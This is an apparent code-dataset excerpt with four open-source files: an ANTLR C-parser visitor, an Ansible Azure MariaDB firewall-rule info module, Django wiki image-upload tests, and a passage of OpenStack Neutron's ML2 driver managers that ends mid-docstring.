repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
smartanthill/plugin-handler-compiler | smartanthill_phc/antlr_parser/CVisitor.py | 2 | 11540 | # Generated from java-escape by ANTLR 4.5
from antlr4 import *
# This class defines a complete generic visitor for a parse tree produced by CParser.
class CVisitor(ParseTreeVisitor):
# Visit a parse tree produced by CParser#FunctionExpression.
def visitFunctionExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#DotExpression.
def visitDotExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#ParenthesizedExpression.
def visitParenthesizedExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#FloatingLiteralExpression.
def visitFloatingLiteralExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#PostIncrementExpression.
def visitPostIncrementExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#CharacterLiteralExpression.
def visitCharacterLiteralExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#ArrowExpression.
def visitArrowExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#IndexExpression.
def visitIndexExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#SizeOfTypeExpression.
def visitSizeOfTypeExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#IdentifierExpression.
def visitIdentifierExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#UnaryOperatorExpression.
def visitUnaryOperatorExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#IntegerLiteralExpression.
def visitIntegerLiteralExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#StringLiteralExpression.
def visitStringLiteralExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#PreIncrementExpression.
def visitPreIncrementExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#argumentExpressionList.
def visitArgumentExpressionList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#castExpression.
def visitCastExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#logicalOrExpression.
def visitLogicalOrExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#conditionalExpression.
def visitConditionalExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#assignmentExpression.
def visitAssignmentExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#expression.
def visitExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#constantExpression.
def visitConstantExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#declaration.
def visitDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#declarationSpecifier.
def visitDeclarationSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#initDeclaratorList.
def visitInitDeclaratorList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#initDeclarator.
def visitInitDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#storageClassSpecifier.
def visitStorageClassSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#typeSpecifier.
def visitTypeSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#structOrUnionSpecifier.
def visitStructOrUnionSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#structOrUnion.
def visitStructOrUnion(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#structDeclaration.
def visitStructDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#specifierQualifierList.
def visitSpecifierQualifierList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#structDeclaratorList.
def visitStructDeclaratorList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#structDeclarator.
def visitStructDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#enumSpecifier.
def visitEnumSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#enumeratorList.
def visitEnumeratorList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#enumerator.
def visitEnumerator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#typeQualifier.
def visitTypeQualifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#functionSpecifier.
def visitFunctionSpecifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#declarator.
def visitDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#directDeclarator.
def visitDirectDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#pointer.
def visitPointer(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#parameterTypeList.
def visitParameterTypeList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#parameterDeclaration.
def visitParameterDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#typeName.
def visitTypeName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#abstractDeclarator.
def visitAbstractDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#directAbstractDeclarator.
def visitDirectAbstractDeclarator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#typedefName.
def visitTypedefName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#initializer.
def visitInitializer(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#initializerList.
def visitInitializerList(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#designation.
def visitDesignation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#designator.
def visitDesignator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#staticAssertDeclaration.
def visitStaticAssertDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#statement.
def visitStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#labeledStatement.
def visitLabeledStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#compoundStatement.
def visitCompoundStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#blockItem.
def visitBlockItem(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#expressionStatement.
def visitExpressionStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#IfStatement.
def visitIfStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#SwitchStatement.
def visitSwitchStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#initExpression.
def visitInitExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#iterationExpression.
def visitIterationExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#WhileStatement.
def visitWhileStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#DoWhileStatement.
def visitDoWhileStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#ForStatement.
def visitForStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#DeclForStatement.
def visitDeclForStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#GotoStatement.
def visitGotoStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#ContinueStatement.
def visitContinueStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#BreakStatement.
def visitBreakStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#ReturnStatement.
def visitReturnStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#compilationUnit.
def visitCompilationUnit(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#externalDeclaration.
def visitExternalDeclaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#functionDefinition.
def visitFunctionDefinition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#preprocessorDirective.
def visitPreprocessorDirective(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#includeDirective.
def visitIncludeDirective(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#defineConstantDirective.
def visitDefineConstantDirective(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#defineFunctionArgs.
def visitDefineFunctionArgs(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by CParser#defineFunctionDirective.
def visitDefineFunctionDirective(self, ctx):
return self.visitChildren(ctx)
| gpl-2.0 |
apollo13/ansible | test/support/integration/plugins/modules/azure_rm_mariadbfirewallrule_info.py | 29 | 6309 | #!/usr/bin/python
#
# Copyright (c) 2018 Zim Kalinowski, <zikalino@microsoft.com>
# Copyright (c) 2019 Matti Ranta, (@techknowlogick)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_mariadbfirewallrule_info
version_added: "2.9"
short_description: Get Azure MariaDB Firewall Rule facts
description:
- Get facts of Azure MariaDB Firewall Rule.
options:
resource_group:
description:
- The name of the resource group.
required: True
type: str
server_name:
description:
- The name of the server.
required: True
type: str
name:
description:
- The name of the server firewall rule.
type: str
extends_documentation_fragment:
- azure
author:
- Zim Kalinowski (@zikalino)
- Matti Ranta (@techknowlogick)
'''
EXAMPLES = '''
- name: Get instance of MariaDB Firewall Rule
azure_rm_mariadbfirewallrule_info:
resource_group: myResourceGroup
server_name: server_name
name: firewall_rule_name
- name: List instances of MariaDB Firewall Rule
azure_rm_mariadbfirewallrule_info:
resource_group: myResourceGroup
server_name: server_name
'''
RETURN = '''
rules:
description:
- A list of dictionaries containing facts for MariaDB Firewall Rule.
returned: always
type: complex
contains:
id:
description:
- Resource ID.
returned: always
type: str
sample: "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/TestGroup/providers/Microsoft.DBforMariaDB/servers/testserver/fire
wallRules/rule1"
server_name:
description:
- The name of the server.
returned: always
type: str
sample: testserver
name:
description:
- Resource name.
returned: always
type: str
sample: rule1
start_ip_address:
description:
- The start IP address of the MariaDB firewall rule.
returned: always
type: str
sample: 10.0.0.16
end_ip_address:
description:
- The end IP address of the MariaDB firewall rule.
returned: always
type: str
sample: 10.0.0.18
'''
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
from azure.mgmt.rdbms.mariadb import MariaDBManagementClient
from msrest.serialization import Model
except ImportError:
# This is handled in azure_rm_common
pass
class AzureRMMariaDbFirewallRuleInfo(AzureRMModuleBase):
def __init__(self):
# define user inputs into argument
self.module_arg_spec = dict(
resource_group=dict(
type='str',
required=True
),
server_name=dict(
type='str',
required=True
),
name=dict(
type='str'
)
)
# store the results of the module operation
self.results = dict(
changed=False
)
self.mgmt_client = None
self.resource_group = None
self.server_name = None
self.name = None
super(AzureRMMariaDbFirewallRuleInfo, self).__init__(self.module_arg_spec, supports_tags=False)
def exec_module(self, **kwargs):
is_old_facts = self.module._name == 'azure_rm_mariadbfirewallrule_facts'
if is_old_facts:
self.module.deprecate("The 'azure_rm_mariadbfirewallrule_facts' module has been renamed to 'azure_rm_mariadbfirewallrule_info'", version='2.13')
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
self.mgmt_client = self.get_mgmt_svc_client(MariaDBManagementClient,
base_url=self._cloud_environment.endpoints.resource_manager)
if (self.name is not None):
self.results['rules'] = self.get()
else:
self.results['rules'] = self.list_by_server()
return self.results
def get(self):
response = None
results = []
try:
response = self.mgmt_client.firewall_rules.get(resource_group_name=self.resource_group,
server_name=self.server_name,
firewall_rule_name=self.name)
self.log("Response : {0}".format(response))
except CloudError as e:
self.log('Could not get facts for FirewallRules.')
if response is not None:
results.append(self.format_item(response))
return results
def list_by_server(self):
response = None
results = []
try:
response = self.mgmt_client.firewall_rules.list_by_server(resource_group_name=self.resource_group,
server_name=self.server_name)
self.log("Response : {0}".format(response))
except CloudError as e:
self.log('Could not get facts for FirewallRules.')
if response is not None:
for item in response:
results.append(self.format_item(item))
return results
def format_item(self, item):
d = item.as_dict()
d = {
'resource_group': self.resource_group,
'id': d['id'],
'server_name': self.server_name,
'name': d['name'],
'start_ip_address': d['start_ip_address'],
'end_ip_address': d['end_ip_address']
}
return d
def main():
AzureRMMariaDbFirewallRuleInfo()
if __name__ == '__main__':
main()
| gpl-3.0 |
nert-gu/Xposition | tests/plugins/images/test_views.py | 1 | 9004 | import base64
import os
from io import BytesIO
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.urls import reverse
from PIL import Image
from wiki.core.plugins import registry as plugin_registry
from wiki.models import URLPath
from wiki.plugins.images import models
from wiki.plugins.images.wiki_plugin import ImagePlugin
from ...base import ArticleWebTestUtils, DjangoClientTestBase, RequireRootArticleMixin, wiki_override_settings
class ImageTests(RequireRootArticleMixin, ArticleWebTestUtils, DjangoClientTestBase):
def setUp(self):
super().setUp()
self.article = self.root_article
# A black 1x1 gif
self.test_data = "R0lGODlhAQABAIAAAAUEBAAAACwAAAAAAQABAAACAkQBADs="
def _create_gif_filestream_from_base64(self, str_base64, **kwargs):
"""
Helper function to create filestream for upload.
Parameters :
strData : str, test string data
Optional Arguments :
filename : str, Defaults to 'test.txt'
"""
filename = kwargs.get('filename', 'test.gif')
data = base64.b64decode(str_base64)
filedata = BytesIO(data)
filestream = InMemoryUploadedFile(
filedata,
None,
filename,
'image',
len(data),
None
)
return filestream
def _create_test_image(self, path):
# Get the form index
plugin_index = -1
for cnt, plugin_instance in enumerate(plugin_registry.get_sidebar()):
if isinstance(plugin_instance, ImagePlugin):
plugin_index = cnt
break
self.assertTrue(plugin_index >= 0, "Image plugin not activated")
base_edit_url = reverse('wiki:edit', kwargs={'path': path})
url = base_edit_url + '?f=form{0:d}'.format(plugin_index)
filestream = self._create_gif_filestream_from_base64(self.test_data)
response = self.client.post(
url,
{
'unsaved_article_title': self.article.current_revision.title,
'unsaved_article_content': self.article.current_revision.content,
'image': filestream,
'images_save': '1',
},
)
self.assertRedirects(response, base_edit_url)
def test_index(self):
url = reverse('wiki:images_index', kwargs={'path': ''})
response = self.client.get(url,)
self.assertContains(response, 'Images')
def test_upload(self):
"""
Tests that simple file upload uploads correctly
Uploading a file should preserve the original filename.
Uploading should not modify file in any way.
"""
self._create_test_image('')
# Check the object was created.
image = models.Image.objects.get()
image_revision = image.current_revision.imagerevision
self.assertEqual(image_revision.get_filename(), 'test.gif')
self.assertEqual(
image_revision.image.file.read(),
base64.b64decode(self.test_data)
)
def get_article(self, cont, image):
urlpath = URLPath.create_urlpath(
URLPath.root(),
"html_image",
title="TestImage",
content=cont
)
if image:
self._create_test_image(urlpath.path)
return urlpath.article.render()
def test_image_missing(self):
output = self.get_article("[image:1]", False)
expected = (
'<figure class="thumbnail"><a href="">'
'<div class="caption"><em>Image not found</em></div>'
'</a><figcaption class="caption"></figcaption></figure>'
)
self.assertEqual(output, expected)
def test_image_default(self):
output = self.get_article("[image:1]", True)
image_rev = models.Image.objects.get().current_revision.imagerevision
expected = (
'<figure class="thumbnail">'
'<a href="' + image_rev.image.name + '">'
'<img alt="test\.gif" src="cache/.*\.jpg">'
'</a><figcaption class="caption"></figcaption></figure>'
)
self.assertRegexpMatches(output, expected)
def test_image_large_right(self):
output = self.get_article("[image:1 align:right size:large]", True)
image_rev = models.Image.objects.get().current_revision.imagerevision
expected = (
'<figure class="thumbnail pull-right">'
'<a href="' + image_rev.image.name + '">'
'<img alt="test\.gif" src="cache/.*\.jpg"></a>'
'<figcaption class="caption"></figcaption></figure>'
)
self.assertRegexpMatches(output, expected)
def test_image_orig(self):
output = self.get_article("[image:1 size:orig]", True)
image_rev = models.Image.objects.get().current_revision.imagerevision
expected = (
'<figure class="thumbnail">'
'<a href="' + image_rev.image.name + '">'
'<img alt="test.gif" src="' + image_rev.image.name + '"></a>'
'<figcaption class="caption"></figcaption></figure>'
)
self.assertEqual(output, expected)
# https://gist.github.com/guillaumepiot/817a70706587da3bd862835c59ef584e
def generate_photo_file(self):
file = BytesIO()
image = Image.new('RGBA', size=(100, 100), color=(155, 0, 0))
image.save(file, 'gif')
file.name = 'test.gif'
file.seek(0)
return file
def test_add_revision(self):
self._create_test_image(path='')
image = models.Image.objects.get()
before_edit_rev = image.current_revision.revision_number
response = self.client.post(
reverse('wiki:images_add_revision', kwargs={
'article_id': self.root_article, 'image_id': image.pk, 'path': '',
}),
data={'image': self.generate_photo_file()}
)
self.assertRedirects(
response, reverse('wiki:edit', kwargs={'path': ''})
)
image = models.Image.objects.get()
self.assertEqual(models.Image.objects.count(), 1)
self.assertEqual(image.current_revision.previous_revision.revision_number, before_edit_rev)
def test_delete_restore_revision(self):
self._create_test_image(path='')
image = models.Image.objects.get()
before_edit_rev = image.current_revision.revision_number
response = self.client.get(
reverse('wiki:images_delete', kwargs={
'article_id': self.root_article, 'image_id': image.pk, 'path': '',
}),
)
self.assertRedirects(
response, reverse('wiki:images_index', kwargs={'path': ''})
)
image = models.Image.objects.get()
self.assertEqual(models.Image.objects.count(), 1)
self.assertEqual(image.current_revision.previous_revision.revision_number, before_edit_rev)
self.assertTrue(image.current_revision.deleted)
# RESTORE
before_edit_rev = image.current_revision.revision_number
response = self.client.get(
reverse('wiki:images_restore', kwargs={
'article_id': self.root_article, 'image_id': image.pk, 'path': '',
}),
)
self.assertRedirects(
response, reverse('wiki:images_index', kwargs={'path': ''})
)
image = models.Image.objects.get()
self.assertEqual(models.Image.objects.count(), 1)
self.assertEqual(image.current_revision.previous_revision.revision_number, before_edit_rev)
self.assertFalse(image.current_revision.deleted)
def test_purge(self):
"""
Tests that an image is really purged
"""
self._create_test_image(path='')
image = models.Image.objects.get()
image_revision = image.current_revision.imagerevision
f_path = image_revision.image.file.name
self.assertTrue(os.path.exists(f_path))
response = self.client.post(
reverse('wiki:images_purge', kwargs={
'article_id': self.root_article, 'image_id': image.pk, 'path': '',
}),
data={'confirm': True}
)
self.assertRedirects(
response, reverse('wiki:images_index', kwargs={'path': ''})
)
self.assertEqual(models.Image.objects.count(), 0)
self.assertFalse(os.path.exists(f_path))
@wiki_override_settings(ACCOUNT_HANDLING=True)
def test_login_on_revision_add(self):
self._create_test_image(path='')
self.client.logout()
image = models.Image.objects.get()
url = reverse('wiki:images_add_revision', kwargs={
'article_id': self.root_article, 'image_id': image.pk, 'path': '',
})
response = self.client.post(url, data={'image': self.generate_photo_file()})
self.assertRedirects(response, '{}?next={}'.format(reverse('wiki:login'), url))
| gpl-3.0 |
kongseokhwan/kulcloud-iitp-neutron | neutron/plugins/ml2/managers.py | 1 | 36204 | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log
import stevedore
from neutron.api.v2 import attributes
from neutron.common import exceptions as exc
from neutron.extensions import multiprovidernet as mpnet
from neutron.extensions import portbindings
from neutron.extensions import providernet as provider
from neutron.extensions import vlantransparent
from neutron.i18n import _LE, _LI
from neutron.plugins.ml2.common import exceptions as ml2_exc
from neutron.plugins.ml2 import db
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2 import models
LOG = log.getLogger(__name__)
MAX_BINDING_LEVELS = 10
class TypeManager(stevedore.named.NamedExtensionManager):
"""Manage network segment types using drivers."""
def __init__(self):
# Mapping from type name to DriverManager
self.drivers = {}
LOG.info(_LI("Configured type driver names: %s"),
cfg.CONF.ml2.type_drivers)
super(TypeManager, self).__init__('neutron.ml2.type_drivers',
cfg.CONF.ml2.type_drivers,
invoke_on_load=True)
LOG.info(_LI("Loaded type driver names: %s"), self.names())
self._register_types()
self._check_tenant_network_types(cfg.CONF.ml2.tenant_network_types)
def _register_types(self):
for ext in self:
network_type = ext.obj.get_type()
if network_type in self.drivers:
LOG.error(_LE("Type driver '%(new_driver)s' ignored because"
" type driver '%(old_driver)s' is already"
" registered for type '%(type)s'"),
{'new_driver': ext.name,
'old_driver': self.drivers[network_type].name,
'type': network_type})
else:
self.drivers[network_type] = ext
LOG.info(_LI("Registered types: %s"), self.drivers.keys())
def _check_tenant_network_types(self, types):
self.tenant_network_types = []
for network_type in types:
if network_type in self.drivers:
self.tenant_network_types.append(network_type)
else:
LOG.error(_LE("No type driver for tenant network_type: %s. "
"Service terminated!"), network_type)
raise SystemExit(1)
LOG.info(_LI("Tenant network_types: %s"), self.tenant_network_types)
def _process_provider_segment(self, segment):
(network_type, physical_network,
segmentation_id) = (self._get_attribute(segment, attr)
for attr in provider.ATTRIBUTES)
if attributes.is_attr_set(network_type):
segment = {api.NETWORK_TYPE: network_type,
api.PHYSICAL_NETWORK: physical_network,
api.SEGMENTATION_ID: segmentation_id}
self.validate_provider_segment(segment)
return segment
msg = _("network_type required")
raise exc.InvalidInput(error_message=msg)
def _process_provider_create(self, network):
if any(attributes.is_attr_set(network.get(attr))
for attr in provider.ATTRIBUTES):
# Verify that multiprovider and provider attributes are not set
# at the same time.
if attributes.is_attr_set(network.get(mpnet.SEGMENTS)):
raise mpnet.SegmentsSetInConjunctionWithProviders()
segment = self._get_provider_segment(network)
return [self._process_provider_segment(segment)]
elif attributes.is_attr_set(network.get(mpnet.SEGMENTS)):
segments = [self._process_provider_segment(s)
for s in network[mpnet.SEGMENTS]]
mpnet.check_duplicate_segments(
segments,
self.is_partial_segment)
return segments
def _match_segment(self, segment, filters):
return all(not filters.get(attr) or segment.get(attr) in filters[attr]
for attr in provider.ATTRIBUTES)
def _get_provider_segment(self, network):
# TODO(manishg): Placeholder method
# Code intended for operating on a provider segment should use
# this method to extract the segment, even though currently the
# segment attributes are part of the network dictionary. In the
# future, network and segment information will be decoupled and
# here we will do the job of extracting the segment information.
return network
def network_matches_filters(self, network, filters):
if not filters:
return True
if any(attributes.is_attr_set(network.get(attr))
for attr in provider.ATTRIBUTES):
segments = [self._get_provider_segment(network)]
elif attributes.is_attr_set(network.get(mpnet.SEGMENTS)):
segments = self._get_attribute(network, mpnet.SEGMENTS)
else:
return True
return any(self._match_segment(s, filters) for s in segments)
def _get_attribute(self, attrs, key):
value = attrs.get(key)
if value is attributes.ATTR_NOT_SPECIFIED:
value = None
return value
def extend_network_dict_provider(self, context, network):
id = network['id']
segments = db.get_network_segments(context.session, id)
if not segments:
LOG.error(_LE("Network %s has no segments"), id)
for attr in provider.ATTRIBUTES:
network[attr] = None
elif len(segments) > 1:
network[mpnet.SEGMENTS] = [
{provider.NETWORK_TYPE: segment[api.NETWORK_TYPE],
provider.PHYSICAL_NETWORK: segment[api.PHYSICAL_NETWORK],
provider.SEGMENTATION_ID: segment[api.SEGMENTATION_ID]}
for segment in segments]
else:
segment = segments[0]
network[provider.NETWORK_TYPE] = segment[api.NETWORK_TYPE]
network[provider.PHYSICAL_NETWORK] = segment[api.PHYSICAL_NETWORK]
network[provider.SEGMENTATION_ID] = segment[api.SEGMENTATION_ID]
def initialize(self):
for network_type, driver in self.drivers.iteritems():
LOG.info(_LI("Initializing driver for type '%s'"), network_type)
driver.obj.initialize()
def create_network_segments(self, context, network, tenant_id):
"""Call type drivers to create network segments."""
segments = self._process_provider_create(network)
session = context.session
mtu = []
with session.begin(subtransactions=True):
network_id = network['id']
if segments:
for segment_index, segment in enumerate(segments):
segment = self.reserve_provider_segment(
session, segment)
db.add_network_segment(session, network_id,
segment, segment_index)
if segment.get(api.MTU) > 0:
mtu.append(segment[api.MTU])
else:
segment = self.allocate_tenant_segment(session)
db.add_network_segment(session, network_id, segment)
if segment.get(api.MTU) > 0:
mtu.append(segment[api.MTU])
network[api.MTU] = min(mtu) if mtu else 0
def is_partial_segment(self, segment):
network_type = segment[api.NETWORK_TYPE]
driver = self.drivers.get(network_type)
if driver:
return driver.obj.is_partial_segment(segment)
else:
msg = _("network_type value '%s' not supported") % network_type
raise exc.InvalidInput(error_message=msg)
def validate_provider_segment(self, segment):
network_type = segment[api.NETWORK_TYPE]
driver = self.drivers.get(network_type)
if driver:
driver.obj.validate_provider_segment(segment)
else:
msg = _("network_type value '%s' not supported") % network_type
raise exc.InvalidInput(error_message=msg)
def reserve_provider_segment(self, session, segment):
network_type = segment.get(api.NETWORK_TYPE)
driver = self.drivers.get(network_type)
return driver.obj.reserve_provider_segment(session, segment)
def allocate_tenant_segment(self, session):
for network_type in self.tenant_network_types:
driver = self.drivers.get(network_type)
segment = driver.obj.allocate_tenant_segment(session)
if segment:
return segment
raise exc.NoNetworkAvailable()
def release_network_segments(self, session, network_id):
segments = db.get_network_segments(session, network_id,
filter_dynamic=None)
for segment in segments:
network_type = segment.get(api.NETWORK_TYPE)
driver = self.drivers.get(network_type)
if driver:
driver.obj.release_segment(session, segment)
else:
LOG.error(_LE("Failed to release segment '%s' because "
"network type is not supported."), segment)
def allocate_dynamic_segment(self, session, network_id, segment):
"""Allocate a dynamic segment using a partial or full segment dict."""
dynamic_segment = db.get_dynamic_segment(
session, network_id, segment.get(api.PHYSICAL_NETWORK),
segment.get(api.SEGMENTATION_ID))
if dynamic_segment:
return dynamic_segment
driver = self.drivers.get(segment.get(api.NETWORK_TYPE))
dynamic_segment = driver.obj.reserve_provider_segment(session, segment)
db.add_network_segment(session, network_id, dynamic_segment,
is_dynamic=True)
return dynamic_segment
def release_dynamic_segment(self, session, segment_id):
"""Delete a dynamic segment."""
segment = db.get_segment_by_id(session, segment_id)
if segment:
driver = self.drivers.get(segment.get(api.NETWORK_TYPE))
if driver:
driver.obj.release_segment(session, segment)
db.delete_network_segment(session, segment_id)
else:
LOG.error(_LE("Failed to release segment '%s' because "
"network type is not supported."), segment)
else:
LOG.debug("No segment found with id %(segment_id)s", segment_id)
class MechanismManager(stevedore.named.NamedExtensionManager):
"""Manage networking mechanisms using drivers."""
def __init__(self):
# Registered mechanism drivers, keyed by name.
self.mech_drivers = {}
# Ordered list of mechanism drivers, defining
# the order in which the drivers are called.
self.ordered_mech_drivers = []
LOG.info(_LI("Configured mechanism driver names: %s"),
cfg.CONF.ml2.mechanism_drivers)
super(MechanismManager, self).__init__('neutron.ml2.mechanism_drivers',
cfg.CONF.ml2.mechanism_drivers,
invoke_on_load=True,
name_order=True)
LOG.info(_LI("Loaded mechanism driver names: %s"), self.names())
self._register_mechanisms()
def _register_mechanisms(self):
"""Register all mechanism drivers.
This method should only be called once in the MechanismManager
constructor.
"""
for ext in self:
self.mech_drivers[ext.name] = ext
self.ordered_mech_drivers.append(ext)
LOG.info(_LI("Registered mechanism drivers: %s"),
[driver.name for driver in self.ordered_mech_drivers])
def initialize(self):
for driver in self.ordered_mech_drivers:
LOG.info(_LI("Initializing mechanism driver '%s'"), driver.name)
driver.obj.initialize()
    def _check_vlan_transparency(self, context):
        """Helper method for checking vlan transparency support.

        :param context: context parameter to pass to each method call
        :raises: neutron.extensions.vlantransparent.
                 VlanTransparencyDriverError if any mechanism driver doesn't
                 support vlan transparency.
        """
        # None means the vlan-transparency extension is not in play for
        # this network; nothing to validate.
        if context.current['vlan_transparent'] is None:
            return
        if context.current['vlan_transparent']:
            # Every registered driver must explicitly support vlan
            # transparency for the request to be accepted.
            for driver in self.ordered_mech_drivers:
                if not driver.obj.check_vlan_transparency(context):
                    raise vlantransparent.VlanTransparencyDriverError()
def _call_on_drivers(self, method_name, context,
continue_on_failure=False):
"""Helper method for calling a method across all mechanism drivers.
:param method_name: name of the method to call
:param context: context parameter to pass to each method call
:param continue_on_failure: whether or not to continue to call
all mechanism drivers once one has raised an exception
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver call fails.
"""
error = False
for driver in self.ordered_mech_drivers:
try:
getattr(driver.obj, method_name)(context)
except Exception:
LOG.exception(
_LE("Mechanism driver '%(name)s' failed in %(method)s"),
{'name': driver.name, 'method': method_name}
)
error = True
if not continue_on_failure:
break
if error:
raise ml2_exc.MechanismDriverError(
method=method_name
)
def create_network_precommit(self, context):
"""Notify all mechanism drivers during network creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_network_precommit call fails.
Called within the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propogated
to the caller, triggering a rollback. There is no guarantee
that all mechanism drivers are called in this case.
"""
self._check_vlan_transparency(context)
self._call_on_drivers("create_network_precommit", context)
def create_network_postcommit(self, context):
"""Notify all mechanism drivers after network creation.
:raises: neutron.plugins.ml2.common.MechanismDriverError
if any mechanism driver create_network_postcommit call fails.
Called after the database transaction. If a mechanism driver
raises an exception, then a MechanismDriverError is propagated
to the caller, where the network will be deleted, triggering
any required cleanup. There is no guarantee that all mechanism
